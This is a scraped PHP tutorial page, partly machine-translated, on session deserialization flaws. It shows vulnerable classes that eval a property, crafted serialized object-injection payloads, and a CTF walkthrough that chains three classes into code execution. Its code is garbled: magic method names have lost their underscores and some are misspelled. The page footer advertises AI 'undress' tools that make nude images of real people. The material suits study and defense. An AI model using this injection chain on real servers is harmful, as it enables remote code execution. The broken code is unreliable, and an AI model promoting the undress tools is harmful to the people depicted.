Detailed explanation of PHP's SESSION deserialization usage
This time I will bring you a detailed explanation of the use of PHP's SESSION deserialization. What are the precautions for using PHP's SESSION deserialization? . Here are actual cases, let's take a look.
There are three configuration items in php.ini:
session.save_path="" --Set the session storage pathsession.save_handler=" " --Set a user-defined storage function. If you want to use something other than PHP's built-in session storage mechanism, you can use this function (database, etc.)
session.auto_start boolen --Specify whether the session module starts a session at the beginning of the request Session, the default is 0 and does not start
session.serialize_handler string --Define the name of the processor used for serialization/deserialization. The options above using php
by default are options related to Session storage and sequence storage in PHP.
In the installation using the xampp component, the above configuration items are set as follows:
session.save_handler=files Indicates that the session is stored in the form of files
session.auto_start=0 Indicates that the session is not started by default
session.serialize_handler=php Indicates that the default serialization engine of the session uses php Serialize engine
In the above configuration, session.serialize_handler is used to set the sequence engine of the session. In addition to the default PHP engine, there are other engines. The storage methods of sessions corresponding to different engines are different. same.
php: The storage method is that the vertical bar of the key name is passed through the serialize() function Serialized value
php_serialize(php>5.5.4): The storage method is that the value serialized by the serialize() function
The PHP engine is used by default in PHP. If you want to modify it to another engine , just add the code ini_set('session.serialize_handler', 'The engine that needs to be set');. The sample code is as follows:
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); // do something
The stored file is named after sess_sessionid, and the content of the file is the content after the sequence of the session value.
Assuming that our environment is xampp, the default configuration is as above.
Under the default configuration:
<?php session_start() $_SESSION['name'] = 'spoock'; var_dump(); ?>
Under the php_serialize engine:
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
<?php ini_set('session.serialize_handler', 'php_binary'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
Simple use of serialization
test.php<?php
class syclover{
var $func="";
function construct() {
$this->func = "phpinfo()";
}
function wakeup(){
eval($this->func);
}
}
unserialize($_GET['a']);
?>object(syclover)[1] public 'func' => string 'echo "spoock";' (length=14)
This is a demonstration of a simple serialization vulnerability
Serialization hazards in PHP Session
PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的。
如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法。例如:
$_SESSION['ryat'] = '|O:11:"PeopleClass":0:{}';上述的$_SESSION的数据使用php_serialize,那么最后的存储的内容就是
a:1:{s:6:"spoock";s:24:"|O:11:"PeopleClass":0:{}";}。但是我们在进行读取的时候,选择的是php,那么最后读取的内容是:
array (size=1)
'a:1:{s:6:"spoock";s:24:"' =>
object(PHP_Incomplete_Class)[1]
public 'PHP_Incomplete_Class_Name' => string 'PeopleClass' (length=11)这是因为当使用php引擎的时候,php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:6:"spoock";s:24:"作为SESSION的key,将O:11:"PeopleClass":0:{}作为value,然后进行反序列化,最后就会得到PeopleClas这个类。
这种由于序列话化和反序列化所使用的不一样的引擎就是造成PHP Session序列话漏洞的原因。
实际利用
存在s1.php和us2.php,2个文件所使用的SESSION的引擎不一样,就形成了一个漏洞、
s1.php,使用php_serialize来处理session
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["spoock"]=$_GET["a"];
us2.php,使用php来处理session
ini_set('session.serialize_handler', 'php');
session_start();
class lemon {
var $hi;
function construct(){
$this->hi = 'phpinfo();';
}
function destruct() {
eval($this->hi);
}
}当访问s1.php时,提交如下的数据:
localhost/s1.php?a=|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}
此时传入的数据会按照php_serialize来进行序列化。
此时访问us2.php时,页面输出,spoock成功执行了我们构造的函数。因为在访问us2.php时,程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,就会实例化lemon对象,最后就会执行析构函数中的eval()方法。
CTF
在安恒杯中的一道题目就考察了这个知识点。题目中的关键代码如下:
class.php
<?php
highlight_string(file_get_contents(basename($_SERVER['PHP_SELF'])));//show_source(FILE);
class foo1{ public $varr; function construct(){ $this->varr = "index.php"; } function destruct(){ if(file_exists($this->varr)){ echo "<br>文件".$this->varr."存在<br>"; } echo "<br>这是foo1的析构函数<br>"; }}
class foo2{ public $varr; public $obj; function construct(){ $this->varr = '1234567890'; $this->obj = null; } function toString(){ $this->obj->execute(); return $this->varr; } function desctuct(){ echo "<br>这是foo2的析构函数<br>"; }}
class foo3{ public $varr; function execute(){ eval($this->varr); } function desctuct(){ echo "<br>这是foo3的析构函数<br>"; }}
?>index.php
<?php
ini_set('session.serialize_handler', 'php');
require("./class.php");
session_start();
$obj = new foo1();
$obj->varr = "phpinfo.php";
?>通过代码发现,我们最终是要通过foo3中的execute来执行我们自定义的函数。
那么我们首先在本地搭建环境,构造我们需要执行的自定义的函数。如下:
myindex.php
<?phpclass foo3{ public $varr='echo "spoock";'; function execute(){ eval($this->varr); }}class foo2{ public $varr; public $obj; function construct(){ $this->varr = '1234567890'; $this->obj = new foo3(); } function toString(){ $this->obj->execute(); return $this->varr; }}
class foo1{ public $varr; function construct(){ $this->varr = new foo2(); }}
$obj = new foo1();print_r(serialize($obj));?>在foo1中的构造函数中定义$varr的值为foo2的实例,在foo2中定义$obj为foo3的实例,在foo3中定义$varr的值为echo "spoock"。最终得到的序列话的值是
O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:14:"echo "spoock";";}}}这样当上面的序列话的值写入到服务器端,然后再访问服务器的index.php,最终就会执行我们预先定义的echo "spoock";的方法了。
写入的方式主要是利用PHP中Session Upload Progress来进行设置,具体为,在上传文件时,如果POST一个名为PHP_SESSION_UPLOAD_PROGRESS的变量,就可以将filename的值赋值到session中
最后就会将文件名写入到session中,具体的实现细节可以参考PHP手册。
但是我在进行本地测试的时候,发现无法实现安恒这道题目所实现的效果,但是最终的原理是一样的。
总结
通过对PHP中的SESSION的分析,对PHP中的SESSION的实现原理有了更加深刻的认识。这个PHP的SESSION问题也是一个很好的问题。上述的这篇文章不仅使大家PHP中的SESSION的序列化漏洞有一个认识,也有助于程序员加强在PHP中的SESSION机制的理解。
相信看了本文案例你已经掌握了方法,更多精彩请关注php中文网其它相关文章!
推荐阅读:
The above is the detailed content of Detailed explanation of PHP's SESSION deserialization usage. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian
Dec 24, 2024 pm 04:42 PM
PHP 8.4 brings several new features, security improvements, and performance improvements with healthy amounts of feature deprecations and removals. This guide explains how to install PHP 8.4 or upgrade to PHP 8.4 on Ubuntu, Debian, or their derivati
7 PHP Functions I Regret I Didn't Know Before
Nov 13, 2024 am 09:42 AM
If you are an experienced PHP developer, you might have the feeling that you’ve been there and done that already.You have developed a significant number of applications, debugged millions of lines of code, and tweaked a bunch of scripts to achieve op
How To Set Up Visual Studio Code (VS Code) for PHP Development
Dec 20, 2024 am 11:31 AM
Visual Studio Code, also known as VS Code, is a free source code editor — or integrated development environment (IDE) — available for all major operating systems. With a large collection of extensions for many programming languages, VS Code can be c
Explain JSON Web Tokens (JWT) and their use case in PHP APIs.
Apr 05, 2025 am 12:04 AM
JWT is an open standard based on JSON, used to securely transmit information between parties, mainly for identity authentication and information exchange. 1. JWT consists of three parts: Header, Payload and Signature. 2. The working principle of JWT includes three steps: generating JWT, verifying JWT and parsing Payload. 3. When using JWT for authentication in PHP, JWT can be generated and verified, and user role and permission information can be included in advanced usage. 4. Common errors include signature verification failure, token expiration, and payload oversized. Debugging skills include using debugging tools and logging. 5. Performance optimization and best practices include using appropriate signature algorithms, setting validity periods reasonably,
PHP Program to Count Vowels in a String
Feb 07, 2025 pm 12:12 PM
A string is a sequence of characters, including letters, numbers, and symbols. This tutorial will learn how to calculate the number of vowels in a given string in PHP using different methods. The vowels in English are a, e, i, o, u, and they can be uppercase or lowercase. What is a vowel? Vowels are alphabetic characters that represent a specific pronunciation. There are five vowels in English, including uppercase and lowercase: a, e, i, o, u Example 1 Input: String = "Tutorialspoint" Output: 6 explain The vowels in the string "Tutorialspoint" are u, o, i, a, o, i. There are 6 yuan in total
How do you parse and process HTML/XML in PHP?
Feb 07, 2025 am 11:57 AM
This tutorial demonstrates how to efficiently process XML documents using PHP. XML (eXtensible Markup Language) is a versatile text-based markup language designed for both human readability and machine parsing. It's commonly used for data storage an
Explain late static binding in PHP (static::).
Apr 03, 2025 am 12:04 AM
Static binding (static::) implements late static binding (LSB) in PHP, allowing calling classes to be referenced in static contexts rather than defining classes. 1) The parsing process is performed at runtime, 2) Look up the call class in the inheritance relationship, 3) It may bring performance overhead.
What are PHP magic methods (__construct, __destruct, __call, __get, __set, etc.) and provide use cases?
Apr 03, 2025 am 12:03 AM
What are the magic methods of PHP? PHP's magic methods include: 1.\_\_construct, used to initialize objects; 2.\_\_destruct, used to clean up resources; 3.\_\_call, handle non-existent method calls; 4.\_\_get, implement dynamic attribute access; 5.\_\_set, implement dynamic attribute settings. These methods are automatically called in certain situations, improving code flexibility and efficiency.
